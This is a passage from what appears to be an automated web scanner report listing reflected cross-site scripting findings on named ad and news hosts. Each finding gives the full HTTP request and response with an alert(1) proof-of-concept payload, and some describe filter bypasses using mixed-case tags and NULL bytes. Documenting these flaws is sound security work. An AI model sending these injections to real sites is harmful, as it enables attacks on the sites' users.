Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='b9b1f';alert(1)//4f2061d893a,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=b9b1f';alert(1)//4f2061d893a,1a0a560b5ac81252e91
...[SNIP]...

2.30. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38af1"%3balert(1)//1c872f3fc6c was submitted in the q parameter. This input was echoed as 38af1";alert(1)//1c872f3fc6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=38af1"%3balert(1)//1c872f3fc6c&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236:305,235949|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24:0,10#0,24;expires=Wed, 12 Oct 2011 12:48:43 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=141
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Content-Length: 6518
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='38af1";alert(1)//1c872f3fc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=38af1";alert(1)//1c872f3fc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


       
...[SNIP]...

2.31. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f095e'%3balert(1)//7fb6e4adbf8 was submitted in the $ parameter. This input was echoed as f095e';alert(1)//7fb6e4adbf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=f095e'%3balert(1)//7fb6e4adbf8&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 478
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:f095e';alert(1)//7fb6e4adbf8,ad769';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,91a0a560b5ee888bf58170a13;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=12:2:1:0:0:0:01a0a560b5991a4ca97d403e3;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:1a0a560b8232ac2cc4a13028;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='f095e';alert(1)//7fb6e4adbf8,ad769'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=f095e';alert(1)//7fb6e4adbf8,ad769';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...

2.32. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80c30'%3balert(1)//e63561c611c was submitted in the q parameter. This input was echoed as 80c30';alert(1)//e63561c611c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=80c30'%3balert(1)//e63561c611c&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 528
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560ba8d0f92af69b0c49,5406e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,91a0a560b5ee888bf58170a13;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=10:2:1:0:0:0:01a0a560b5991a4ca97d403e3;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:1a0a560b8232ac2cc4a13028;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='80c30';alert(1)//e63561c611c,1a0a560ba8d0f92af69b0c49,5406e'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=80c30';alert(1)//e63561c611c,1a0a560ba8d0f92af69b0c49,5406e';z="+Math.random();}

if(zzuid=
...[SNIP]...

2.33. http://choices.truste.com/ca [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 9d4a0<script>alert(1)</script>dfdd840350b was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=abs01&cid=0811abs728x90&c=abs01cont199d4a0<script>alert(1)</script>dfdd840350b&w=728&h=90 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 6674
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
ntDivName:"te-clr1-1d4bc8b5-f459-45d2-9d9b-7185b46bfc5d-itl",iconSpanId:"te-clr1-1d4bc8b5-f459-45d2-9d9b-7185b46bfc5d-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"abs01cont199d4a0<script>alert(1)</script>dfdd840350b",noticeBaseUrl:"http://choices-elb.truste.com/camsg?",irBaseUrl:"http://choices-elb.truste.com/cair?",interstitial:te_clr1_1d4bc8b5_f459_45d2_9d9b_7185b46bfc5d_ib,interstitialWidth:728,interstitialHei
...[SNIP]...

2.34. http://choices.truste.com/ca [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 94f4e<ScRiPt>alert(1)</ScRiPt>241f43fb5a was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=abs01&cid=0811abs728x9094f4e<ScRiPt>alert(1)</ScRiPt>241f43fb5a&c=abs01cont19&w=728&h=90 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 6752
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<a href="http://preferences.truste.com/preference.html?affiliateId=109&pid=mec01&aid=abs01&cid=0811abs728x9094f4e<ScRiPt>alert(1)</ScRiPt>241f43fb5a&w=728&h=90" target="_blank">
...[SNIP]...

2.35. http://cm.npc-morris.overture.com/js_1_0/ [css_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-morris.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca685"><script>alert(1)</script>7a61d61a441 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685"><script>alert(1)</script>7a61d61a441&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547 HTTP/1.1
Host: cm.npc-morris.overture.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMjSyNnCxMAY6dMoAw=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyNHF2dXM0MAI45Nxww=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 09-Sep-2021 12:48:46 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4670


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<link rel="stylesheet" href="http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685"><script>alert(1)</script>7a61d61a441" type="text/css">
...[SNIP]...

2.36. http://dailydeals.savannahnow.com/widgets/300x250 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dailydeals.savannahnow.com
Path:   /widgets/300x250

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9aab3<img%20src%3da%20onerror%3dalert(1)>b54fa5f1680 was submitted in the REST URL parameter 2. This input was echoed as 9aab3<img src=a onerror=alert(1)>b54fa5f1680 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /widgets/300x2509aab3<img%20src%3da%20onerror%3dalert(1)>b54fa5f1680 HTTP/1.1
Host: dailydeals.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Mon, 12 Sep 2011 12:46:15 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 80

Could not find the template: 300x2509aab3<img src=a onerror=alert(1)>b54fa5f1680

2.37. http://go.savannahnow.com/partner_json/search [jsonsp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 5a2f8<script>alert(1)</script>96b82a10b8e was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=&nbh=&rand_spn=5&st=event&jsonsp=jsp_05a2f8<script>alert(1)</script>96b82a10b8e HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:21 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 95
ETag: "dd325e227c05454e7cb9131302f53e61"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: 40ceae8c13c9e185408d91ae53049dba4bf265fc
Z-REQUEST-HANDLED-BY: www16
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2882

jsp_05a2f8<script>alert(1)</script>96b82a10b8e('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Darius Rucker","has_tickets":true,"tickets_on_sale":null,"venue_id":854691,"id":172970805,"starttime":"Fri Sep 16 19:00:00 UTC 2011","zurl
...[SNIP]...

2.38. http://go.savannahnow.com/partner_json/search [limit parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the limit request parameter is copied into the HTML document as plain text between tags. The payload %007c843<script>alert(1)</script>4e254564077 was submitted in the limit parameter. This input was echoed as 7c843<script>alert(1)</script>4e254564077 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10%007c843<script>alert(1)</script>4e254564077&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:18 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 178
ETag: "2865bab473716d7743b16d03277163cf"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: 20dedd0ce3207e873334ffc6054c1ecef3c12fd0
Z-REQUEST-HANDLED-BY: www11
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2883

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Darius Rucker","has_tickets":true,"tickets_on_sale":null,"venue_id":854691,"id":172970805,"starttime":"Fri Sep 16 19:00:00 UTC 2011"
...[SNIP]...
e":-81.0965,"state":"GA"},"sort":0,"offset":0,"when":"","what":"","catex":null,"limit":10,"sst":1315785600},"next_page":true,"identifier": "st=event,event_spn&where=savannah%2Cga&ssi=0&ssrss=1&srss=10.7c843<script>alert(1)</script>4e254564077"}}})')

2.39. http://go.savannahnow.com/partner_json/search [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 4eca2<script>alert(1)</script>359798be485 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=&nbh=&rand_spn=5&st=event4eca2<script>alert(1)</script>359798be485&jsonsp=jsp_0 HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:21 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 24
ETag: "0194a4c93866eccde160f1035af0809f"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: 5bfc14f4ea2617979a6a978686383b96c0f6e602
Z-REQUEST-HANDLED-BY: www2
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 131

{"rsp":{"status":"failed","msg":"Invalid search: event4eca2<script>alert(1)</script>359798be485 is not a valid search category."}}

